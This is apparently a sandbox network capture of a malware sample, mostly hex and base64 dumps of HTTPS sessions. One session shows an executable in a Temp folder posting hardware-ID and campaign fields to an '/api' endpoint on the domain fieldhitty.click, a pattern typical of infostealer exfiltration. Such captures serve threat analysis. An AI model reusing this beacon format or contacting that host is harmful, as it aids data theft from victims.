2f 6d 4c 7a Data Ascii: 7c2)]}'{"ddljson":{"accessibility_description":"","alt_text":"Seasonal Holidays 2024","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAAD6CAMAAABK88kiAAADAFBMVEVHcEyQ+f/+sZLpsOD65JP9ew7lnun943b3PjryTED+krT683n/ODb9lr7/NjP9bIDejvz/mLz
2024-12-22 01:19:00 UTC	1390	IN	Data Raw: 5a 5a 6e 6d 59 36 79 32 57 4a 4c 79 59 71 76 2b 57 45 6a 2b 63 61 2f 37 58 71 44 36 4d 69 30 46 37 4f 58 34 4d 69 79 71 53 30 79 63 56 6d 45 4d 38 4f 59 41 37 66 38 41 38 65 55 45 34 66 76 2b 51 45 49 42 37 76 38 41 36 66 76 37 4c 69 66 38 4d 43 6f 44 39 64 2f 39 4e 44 41 4a 38 4e 61 63 53 6b 6b 49 36 75 6f 48 37 65 4b 54 54 30 7a 36 4c 79 66 2b 51 59 48 73 51 44 62 47 50 54 2b 77 51 55 48 64 4e 44 46 69 59 57 50 2b 4c 43 56 68 58 46 78 63 57 6c 70 67 57 6c 30 75 67 50 6f 4c 52 2b 70 62 57 31 70 62 57 6c 74 64 57 31 35 4f 56 6e 35 66 59 46 31 63 58 56 7a 37 4c 43 56 63 58 46 78 46 52 35 6f 4e 51 75 4d 4c 50 65 31 50 58 56 77 77 51 62 51 51 50 76 73 75 65 2f 51 4b 4f 76 44 39 4c 69 63 79 68 76 67 75 67 2f 67 41 62 4f 59 31 68 50 67 45 37 64 55 41 32 2b 6f Data Ascii: ZZnmY6y2WJLyYqv+WEj+ca/7XqD6Mi0F7OX4MiyqS0ycVmEM8OYA7f8A8eUE4fv+QEIB7v8A6fv7Lif8MCoD9d/9NDAJ8NacSkkI6uoH7eKTT0z6Lyf+QYHsQDbGPT+wQUHdNDFiYWP+LCVhXFxcWlpgWl0ugPoLR+pbW1pbWltdW15OVn5fYF1cXVz7LCVcXFxFR5oNQuMLPe1PXVwwQbQQPvsue/QKOvD9Licyhvgug/gAbOY1hPgE7dUA2+o
2024-12-22 01:19:00 UTC	231	IN	Data Raw: 59 55 39 4d 6f 6f 30 31 75 6a 31 45 31 66 4f 53 32 57 39 52 6d 4f 6c 55 5a 5a 35 51 52 4d 54 65 48 68 6c 4c 46 4b 6e 72 33 42 49 37 63 6c 47 4e 5a 6e 53 47 76 64 36 4c 4a 57 45 74 57 41 70 6f 77 31 59 45 31 67 38 61 63 4d 32 6c 4a 4d 36 2b 73 59 56 71 76 4c 57 6f 47 7a 73 53 69 48 70 38 64 62 62 67 75 2f 39 59 4c 48 34 61 64 49 69 33 7a 4e 50 75 53 73 48 49 70 79 33 75 2b 38 4e 78 34 6b 4c 36 47 73 62 4a 62 34 63 4c 4f 49 4d 46 61 4e 7a 6c 6b 4e 4d 53 75 48 50 38 6d 71 4b 48 48 42 37 57 59 31 4e 55 52 74 47 71 77 42 55 4a 55 7a 78 71 47 68 47 69 6e 4c 68 6b 73 74 78 62 49 2b 78 35 4d 77 37 35 56 79 4b 6f 2f 56 33 67 63 48 66 77 6a 77 49 5a 50 7a 30 4a 69 79 57 62 57 77 69 4c 53 0d 0a Data Ascii: YU9Moo01uj1E1fOS2W9RmOlUZZ5QRMTeHhlLFKnr3BI7clGNZnSGvd6LJWEtWApow1YE1g8acM2lJM6+sYVqvLWoGzsSiHp8dbbgu/9YLH4adIi3zNPuSsHIpy3u+8Nx4kL6GsbJb4cLOIMFaNzlkNMSuHP8mqKHHB7WY1NURtGqwBUJUzxqGhGinLhkstxbI+x5Mw75VyKo/V3gcHfwjwIZPz0JiyWbWwiLS
2024-12-22 01:19:00 UTC	169	IN	Data Raw: 61 33 0d 0a 49 65 36 57 47 6b 46 56 4a 71 69 68 78 68 66 50 51 47 70 56 75 77 2f 4d 66 61 65 6f 6f 5a 51 57 39 73 38 36 35 73 46 5a 48 66 7a 6a 69 37 33 41 4b 66 38 55 35 70 36 56 4d 4c 2b 70 6c 45 57 6e 59 58 6c 35 4a 56 33 42 49 56 5a 30 75 32 65 46 53 79 6f 71 62 74 53 32 72 32 53 44 53 4b 61 77 42 6e 48 4c 53 6c 5a 65 39 43 6c 6c 64 70 43 71 38 46 49 64 41 4a 6d 74 6e 6a 4f 4a 6c 31 75 64 34 45 41 4b 79 77 69 6d 34 6c 30 4d 51 57 51 47 71 75 6c 36 75 59 70 7a 6d 35 5a 72 4c 38 75 65 30 57 62 0d 0a Data Ascii: a3Ie6WGkFVJqihxhfPQGpVuw/MfaeooZQW9s865sFZHfzji73AKf8U5p6VML+plEWnYXl5JV3BIVZ0u2eFSyoqbtS2r2SDSKawBnHLSlZe9ClldpCq8FIdAJmtnjOJl1ud4EAKywim4l0MQWQGqul6uYpzm5ZrL8ue0Wb
2024-12-22 01:19:00 UTC	1390	IN	Data Raw: 35 34 39 62 0d 0a 33 61 54 68 62 62 6f 6c 70 58 4e 6e 54 6c 2f 64 45 66 51 31 62 49 36 4c 70 65 38 52 44 54 50 4d 39 33 5a 62 58 69 61 5a 68 75 77 6c 64 76 6b 78 4a 50 77 6a 52 58 73 4e 76 4c 59 4b 57 31 4f 75 57 73 52 6a 78 6d 75 4c 39 65 63 31 68 35 73 73 7a 48 39 30 6d 4a 65 2b 57 55 4d 30 36 36 77 6a 6b 59 73 70 4b 71 38 44 64 47 4d 34 78 58 65 4c 4e 5a 74 62 43 49 30 46 55 4f 43 31 4a 58 44 77 68 72 52 56 54 72 2b 50 6a 30 4e 41 5a 50 4b 53 7a 49 59 5a 58 4a 36 6d 42 37 78 34 46 6f 63 2b 45 65 72 39 75 50 68 36 4e 6b 64 51 70 64 6a 63 2f 7a 76 49 78 69 51 56 63 54 33 6a 65 62 64 53 36 54 56 51 6d 4c 47 46 62 4d 43 71 51 72 5a 41 55 72 6a 47 76 59 71 65 6c 52 49 4b 79 59 57 4e 6d 73 65 4a 2f 55 62 75 2b 2f 4e 30 51 69 58 37 6c 44 50 41 69 50 59 62 44 Data Ascii: 549b3aThbbolpXNnTl/dEfQ1bI6Lpe8RDTPM93ZbXiaZhuwldvkxJPwjRXsNvLYKW1OuWsRjxmuL9ec1h5sszH90mJe+WUM066wjkYspKq8DdGM4xXeLNZtbCI0FUOC1JXDwhrRVTr+Pj0NAZPKSzIYZXJ6mB7x4Foc+Eer9uPh6NkdQpdjc/zvIxiQVcT3jebdS6TVQmLGFbMCqQrZAUrjGvYqelRIKyYWNmseJ/Ubu+/N0QiX7lDPAiPYbD
2024-12-22 01:19:00 UTC	1390	IN	Data Raw: 58 38 6b 2b 79 62 51 75 73 71 6d 71 32 49 45 4a 6b 4b 38 30 69 77 38 4c 74 39 7a 37 67 41 71 78 37 72 72 47 6c 76 64 65 66 52 50 65 37 71 71 64 48 6f 50 2b 44 42 70 55 58 50 61 38 41 71 71 5a 47 72 54 65 30 71 6c 33 46 64 52 31 36 45 54 69 67 73 36 34 71 67 78 4f 71 4b 55 44 33 66 50 7a 38 50 43 64 59 7a 2f 63 65 79 70 4c 50 77 5a 46 6b 54 6c 31 69 54 54 30 4b 6b 38 64 52 73 50 43 41 51 4a 62 51 77 76 37 65 75 71 77 6f 42 72 49 42 68 36 64 6b 39 34 30 43 57 6e 64 30 54 76 6d 69 51 75 6f 70 55 49 57 38 49 56 67 64 2f 6a 47 68 46 4d 2f 7a 6b 79 6a 4a 65 4a 74 77 5a 4c 36 79 6e 74 37 56 33 59 4d 57 30 4a 4f 38 78 5a 4d 46 56 6f 46 31 42 31 67 4a 47 4c 44 53 57 6a 46 6a 4a 68 47 56 68 73 53 70 32 56 52 64 58 6e 41 48 42 47 76 44 66 51 6b 74 6b 7a 59 4b 56 4d Data Ascii: X8k+ybQusqmq2IEJkK80iw8Lt9z7gAqx7rrGlvdefRPe7qqdHoP+DBpUXPa8AqqZGrTe0ql3FdR16ETigs64qgxOqKUD3fPz8PCdYz/ceypLPwZFkTl1iTT0Kk8dRsPCAQJbQwv7euqwoBrIBh6dk940CWnd0TvmiQuopUIW8IVgd/jGhFM/zkyjJeJtwZL6ynt7V3YMW0JO8xZMFVoF1B1gJGLDSWjFjJhGVhsSp2VRdXnAHBGvDfQktkzYKVM
2024-12-22 01:19:00 UTC	1390	IN	Data Raw: 53 69 66 68 4f 42 56 4c 4e 55 53 65 2b 59 58 46 78 63 57 6c 63 39 33 57 34 56 6f 50 6c 79 78 56 71 39 56 61 4b 2b 52 37 69 67 58 32 53 4e 63 72 68 77 65 47 49 59 38 33 4f 69 56 2f 2b 34 78 69 57 52 6d 64 6a 75 47 39 59 6d 4d 4a 56 6e 2b 42 61 6b 58 4e 69 71 58 4d 51 6d 59 31 48 77 7a 52 4c 48 45 39 69 6f 64 43 6d 6c 68 59 4e 68 43 58 49 6d 54 42 63 75 45 61 66 31 68 44 56 69 77 4d 4c 42 52 4c 44 51 77 48 6f 53 4a 66 67 6c 65 45 69 36 72 4f 6a 42 6b 39 68 53 49 71 4a 61 56 61 4b 6e 4c 70 37 65 74 56 33 5a 41 49 7a 73 78 53 57 4a 39 62 49 62 42 41 4c 4c 34 59 72 64 63 4d 58 6f 69 72 7a 46 79 6c 69 56 77 73 62 32 62 30 6f 73 67 53 4c 56 6b 79 4e 56 62 72 69 67 58 59 37 44 5a 79 6f 30 50 56 49 6c 37 74 74 75 41 6b 46 4b 39 59 51 37 45 55 75 55 53 6b 75 6e 7a Data Ascii: SifhOBVLNUSe+YXFxcWlc93W4VoPlyxVq9VaK+R7igX2SNcrhweGIY83OiV/+4xiWRmdjuG9YmMJVn+BakXNiqXMQmY1HwzRLHE9iodCmlhYNhCXImTBcuEaf1hDViwMLBRLDQwHoSJfgleEi6rOjBk9hSIqJaVaKnLp7etV3ZAIzsxSWJ9bIbBALL4YrdcMXoirzFyliVwsb2b0osgSLVkyNVbrigXY7DZyo0PVIl7ttuAkFK9YQ7EUuUSkunz
2024-12-22 01:19:00 UTC	1390	IN	Data Raw: 66 66 76 58 74 44 50 69 64 57 76 58 76 33 47 72 31 53 33 4c 48 65 33 79 6d 76 7a 4c 67 61 56 59 41 34 4a 33 4d 75 44 45 78 4e 74 64 2b 6a 63 57 73 66 41 47 36 37 71 6a 64 6b 78 50 4c 63 38 7a 41 5a 4a 62 47 79 2b 71 5a 4c 48 57 4f 62 32 30 4a 42 72 4b 2f 78 36 51 5a 65 72 43 63 76 6a 78 35 31 4f 4b 68 59 46 76 6a 79 4d 4d 7a 42 35 74 4b 39 6a 56 67 66 6e 76 6e 66 49 65 69 56 51 6d 4b 39 66 2f 2f 78 34 38 64 50 34 63 44 4b 74 57 71 73 41 58 79 31 56 53 37 5a 6e 6d 72 77 39 55 71 57 67 72 55 2f 73 55 51 74 46 74 6d 77 64 44 6b 6c 73 53 71 74 69 59 56 39 51 32 50 4a 6e 43 43 41 56 6b 31 58 4f 6e 57 7a 44 72 34 6b 57 47 79 4f 53 43 4f 77 69 46 55 45 4b 4e 31 6c 76 43 4a 69 6a 62 37 78 76 30 61 76 77 75 69 56 62 47 4a 39 35 4c 6e 74 38 7a 39 65 6d 56 71 4e 69 Data Ascii: ffvXtDPidWvXv3Gr1S3LHe3ymvzLgaVYA4J3MuDExNtd+jcWsfAG67qjdkxPLc8zAZJbGy+qZLHWOb20JBrK/x6QZerCcvjx51OKhYFvjyMMzB5tK9jVgfnvnfIeiVQmK9f//x48dP4cDKtWqsAXy1VS7Znmrw9UqWgrU/sUQtFtmwdDklsSqtiYV9Q2PJnCCAVk1XOnWzDr4kWGyOSCOwiFUEKN1lvCJijb7xv0avwuiVbGJ95Lnt8z9emVqNi
2024-12-22 01:19:00 UTC	1390	IN	Data Raw: 34 48 49 59 4e 64 46 77 6c 69 56 61 38 37 57 76 4b 6a 63 31 6b 72 4b 6c 70 34 6e 45 74 4e 52 79 61 68 6b 4c 79 49 4c 6d 6e 66 56 59 6d 66 46 4b 72 6a 49 41 31 6d 6c 65 43 57 75 4e 73 53 42 73 51 6b 72 4b 75 72 74 4d 5a 42 6e 43 57 69 36 56 78 6b 34 4d 2f 71 67 6d 56 78 6a 77 46 56 43 6c 35 69 50 5a 76 39 78 44 73 75 35 6f 64 57 53 6a 61 4f 34 4b 73 47 35 6f 4a 69 32 35 6e 67 42 59 75 57 74 72 2f 34 51 2f 4a 35 49 4e 4f 78 51 47 31 72 72 58 72 55 56 32 6b 69 76 75 4b 36 79 42 4a 43 75 76 73 77 75 57 46 78 59 47 79 4e 49 2f 6f 55 4f 6b 30 59 31 4c 55 7a 58 47 42 35 39 65 47 70 61 61 7a 4c 44 34 2f 72 61 35 4d 6c 2f 53 51 62 42 77 33 44 42 4c 6c 52 41 34 6f 6d 42 42 7a 49 7a 50 7a 56 31 46 72 73 78 37 33 76 6d 4c 51 71 71 46 6c 57 51 70 79 78 52 64 57 48 41 Data Ascii: 4HIYNdFwliVa87WvKjc1krKlp4nEtNRyahkLyILmnfVYmfFKrjIA1mleCWuNsSBsQkrKurtMZBnCWi6Vxk4M/qgmVxjwFVCl5iPZv9xDsu5odWSjaO4KsG5oJi25ngBYuWtr/4Q/J5INOxQG1rrXrUV2kivuK6yBJCuvswuWFxYGyNI/oUOk0Y1LUzXGB59eGpaazLD4/ra5Ml/SQbBw3DBLlRA4omBBzIzPzV1Frsx73vmLQqqFlWQpyxRdWHA
2024-12-22 01:19:00 UTC	1390	IN	Data Raw: 4d 36 47 6f 2b 6e 42 62 43 47 53 46 6d 34 64 51 62 49 75 6a 55 2b 41 31 77 74 59 6f 7a 62 6f 4a 47 72 79 33 69 52 30 50 70 4e 6a 4b 71 56 35 52 4d 6a 42 35 4a 57 2f 37 4a 36 4e 7a 6f 32 45 59 2f 30 45 31 62 6c 2f 6f 70 6d 37 69 33 66 2f 67 7a 4e 4f 2b 71 71 57 47 51 37 53 42 4e 74 44 67 72 38 36 2b 56 38 76 62 36 76 45 43 6e 73 73 4c 43 49 71 79 34 6e 4e 6c 4e 59 42 41 56 57 63 45 44 38 75 45 53 41 4c 5a 39 67 43 37 68 79 32 59 33 6e 71 62 49 56 6a 57 32 61 6a 50 58 70 6c 4e 53 78 42 44 59 43 34 55 49 38 48 73 6b 32 43 52 5a 31 57 59 77 73 54 43 61 44 56 47 45 57 4d 38 53 56 41 4d 76 4d 6c 64 6c 59 4a 6d 55 78 74 50 6f 6a 79 79 6b 41 53 6c 44 46 75 45 4b 77 4d 4d 52 56 4b 32 54 4a 31 31 63 30 62 65 55 47 59 6b 56 67 68 56 57 31 7a 65 37 49 37 67 7a 34 58 Data Ascii: M6Go+nBbCGSFm4dQbIujU+A1wtYozboJGry3iR0PpNjKqV5RMjB5JW/7J6Nzo2EY/0E1bl/opm7i3f/gzNO+qqWGQ7SBNtDgr86+V8vb6vECnssLCIqy4nNlNYBAVWcED8uESALZ9gC7hy2Y3nqbIVjW2ajPXplNSxBDYC4UI8Hsk2CRZ1WYwsTCaDVGEWM8SVAMvMldlYJmUxtPojyykASlDFuEKwMMRVK2TJ11c0beUGYkVghVW1ze7I7gz4X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50254	104.21.89.115	443	7796	C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:59 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=39L416L3976CCY2K5I User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: fieldhitty.click
2024-12-22 01:18:59 UTC	15331	OUT	Data Raw: 2d 2d 33 39 4c 34 31 36 4c 33 39 37 36 43 43 59 32 4b 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 39 4c 34 31 36 4c 33 39 37 36 43 43 59 32 4b 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 39 4c 34 31 36 4c 33 39 37 36 43 43 59 32 4b 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 33 Data Ascii: --39L416L3976CCY2K5IContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--39L416L3976CCY2K5IContent-Disposition: form-data; name="pid"3--39L416L3976CCY2K5IContent-Disposition: form-data; name="lid"PvbArZ----3
2024-12-22 01:18:59 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-12-22 01:19:00 UTC	1130	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qu0jpnm9n525sgn4mmvs1uar9c; expires=Wed, 16 Apr 2025 19:05:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m3yhtTatDJoLjR4IpzWq9tooUUv%2FnjxZxWo%2Bs84GkQQL1XWYsSd70DNMeg%2BGOFZEDSzFg0L5bjE9y8wI24OSD1ubekKv%2BBZprIo5WArvFV6%2BfQBs2b4uHghknxpp9QCSXxpC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47f93ccb7274-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1817&rtt_var=688&sent=19&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21394&delivery_rate=1583514&cwnd=182&unsent_bytes=0&cid=93e8e73b1ebd7a4b&ts=1108&x=0"
2024-12-22 01:19:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:19:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	50256	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:01 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:19:02 UTC	1266	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:02 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-n6zPIw9WXGjwJeV60JLRiA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:19:02 UTC	124	IN	Data Raw: 38 31 64 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 65 77 20 73 70 65 63 69 65 73 20 64 69 73 63 6f 76 65 72 65 64 20 70 65 72 75 22 2c 22 7a 6f 64 69 61 63 20 73 69 67 6e 73 20 64 61 69 6c 79 20 68 6f 72 6f 73 63 6f 70 65 20 74 6f 64 61 79 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 22 2c 22 73 61 6e 20 64 69 65 67 6f 20 69 6e 74 65 72 6e 61 74 69 6f 6e 61 Data Ascii: 81d)]}'["",["new species discovered peru","zodiac signs daily horoscope today","college football","san diego internationa
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 6c 20 61 69 72 70 6f 72 74 20 64 65 6c 61 79 73 22 2c 22 6d 61 72 76 65 6c 20 72 69 76 61 6c 73 20 77 69 6e 20 72 61 74 65 73 22 2c 22 6e 79 74 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 73 22 2c 22 6f 70 65 6e 61 69 20 6f 33 20 6d 69 6e 69 22 2c 22 6d 6c 62 20 6d 65 74 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 Data Ascii: l airport delays","marvel rivals win rates","nyt crossword clues","openai o3 mini","mlb mets"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetai
2024-12-22 01:19:02 UTC	570	IN	Data Raw: 31 53 31 5a 75 63 44 67 32 62 55 5a 7a 64 57 70 74 4e 48 5a 76 55 56 5a 43 4e 56 4e 36 4d 33 52 77 4d 55 56 4e 54 31 63 31 64 47 4e 74 65 48 4e 6a 53 48 46 4e 65 48 46 76 65 47 31 42 4c 31 64 45 64 56 6c 6f 56 48 4e 6e 61 6d 39 35 56 31 46 75 56 48 45 79 53 48 68 43 63 6a 6c 50 4d 58 6f 30 64 30 74 76 63 54 4e 70 62 33 42 33 53 48 70 6f 64 6e 45 35 56 48 52 45 65 6d 63 7a 51 54 46 42 51 57 63 34 56 47 55 31 51 58 64 55 54 33 42 49 63 44 52 68 62 58 46 68 56 45 39 35 63 6b 4e 4e 4f 45 4e 71 61 6a 46 4e 62 57 73 79 53 56 68 79 4d 54 46 59 55 44 6c 4b 4e 31 6c 46 55 47 4a 51 5a 58 6b 35 56 6c 64 57 61 32 4e 73 56 32 59 78 62 33 6c 78 64 47 52 46 63 55 74 73 53 48 49 77 53 6c 6c 46 63 48 52 6a 62 53 38 7a 61 6d 46 34 65 48 46 61 55 6b 70 4f 53 7a 6c 6a 57 6e Data Ascii: 1S1ZucDg2bUZzdWptNHZvUVZCNVN6M3RwMUVNT1c1dGNteHNjSHFNeHFveG1BL1dEdVloVHNnam95V1FuVHEySHhCcjlPMXo0d0tvcTNpb3B3SHpodnE5VHREemczQTFBQWc4VGU1QXdUT3BIcDRhbXFhVE95ckNNOENqajFNbWsySVhyMTFYUDlKN1lFUGJQZXk5VldWa2NsV2Yxb3lxdGRFcUtsSHIwSllFcHRjbS8zamF4eHFaUkpOSzljWn
2024-12-22 01:19:02 UTC	88	IN	Data Raw: 35 32 0d 0a 77 4e 6c 52 4f 53 56 70 72 63 48 41 78 56 55 38 32 62 44 4a 4b 63 30 35 35 63 45 74 6f 63 6b 52 73 64 57 59 35 57 54 56 4d 53 45 35 46 63 6e 63 72 62 48 70 78 59 55 31 56 54 58 45 32 4d 47 35 54 65 6d 30 31 52 6e 4a 47 5a 32 56 4a 55 6e 56 45 57 0d 0a Data Ascii: 52wNlROSVprcHAxVU82bDJKc055cEtockRsdWY5WTVMSE5FcncrbHpxYU1VTXE2MG5Tem01RnJGZ2VJUnVEW
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 31 35 63 64 0d 0a 57 4a 46 57 44 4e 32 59 55 70 53 53 6b 4a 4b 55 55 6c 4c 54 58 4a 45 52 6b 52 50 62 58 42 78 62 46 59 77 4d 7a 4e 30 65 57 6c 34 64 6a 56 31 54 47 55 72 54 48 4d 33 65 48 4e 78 64 7a 56 58 52 31 67 77 63 6a 4a 4e 64 46 56 30 4e 32 78 30 4d 48 56 69 4f 55 39 30 4b 32 63 32 57 56 64 56 56 7a 4a 75 61 46 56 54 52 6b 70 59 61 6a 42 74 62 6e 70 70 54 55 64 72 61 6c 46 4c 4d 47 6c 6d 57 6e 52 30 59 30 56 72 55 48 56 69 62 6e 5a 5a 4b 7a 4a 47 59 7a 42 6f 63 55 4a 45 62 55 74 56 4e 48 70 74 54 6a 49 35 54 32 4a 33 54 33 4a 72 61 32 52 55 53 48 46 57 61 47 5a 5a 51 6d 64 4f 61 6a 51 7a 4d 32 5a 73 64 6c 56 56 63 6e 64 57 52 6b 4e 52 61 6a 41 77 57 6b 31 6a 5a 46 4e 4d 61 6d 31 50 62 30 46 6e 5a 32 4e 31 65 48 59 77 55 46 52 44 64 47 5a 73 59 6c Data Ascii: 15cdWJFWDN2YUpSSkJKUUlLTXJERkRPbXBxbFYwMzN0eWl4djV1TGUrTHM3eHNxdzVXR1gwcjJNdFV0N2x0MHViOU90K2c2WVdVVzJuaFVTRkpYajBtbnppTUdralFLMGlmWnR0Y0VrUHVibnZZKzJGYzBocUJEbUtVNHptTjI5T2J3T3Jra2RUSHFWaGZZQmdOajQzM2ZsdlVVcndWRkNRajAwWk1jZFNMam1Pb0FnZ2N1eHYwUFRDdGZsYl
2024-12-22 01:19:02 UTC	1390	IN	Data Raw: 55 6c 67 34 51 55 6f 7a 62 57 56 77 59 6e 70 50 4d 48 51 7a 51 6e 68 30 56 43 39 73 62 6d 34 76 5a 6c 5a 59 4c 32 4a 36 4e 79 39 6e 4d 54 56 46 56 6c 6c 6d 65 44 68 32 57 43 39 5a 55 30 31 30 54 55 63 7a 4c 33 51 32 55 33 64 33 54 6c 52 70 56 58 6c 6f 63 6d 63 32 62 6e 45 7a 4b 30 64 68 63 6b 31 57 5a 47 52 4b 4e 44 56 55 62 31 4a 50 54 6c 64 5a 57 55 38 7a 63 46 70 68 53 6b 6f 72 56 54 4e 44 64 6c 4a 56 54 30 52 51 52 6c 64 74 5a 55 6c 53 5a 56 42 48 5a 57 4a 52 56 54 4e 4f 56 56 52 34 61 55 77 78 62 6c 70 57 61 6d 6f 76 64 46 70 6f 4b 30 70 46 52 69 74 52 56 6a 45 34 62 45 78 59 5a 48 6f 35 54 32 74 53 56 58 4a 42 4d 58 56 6a 4e 55 70 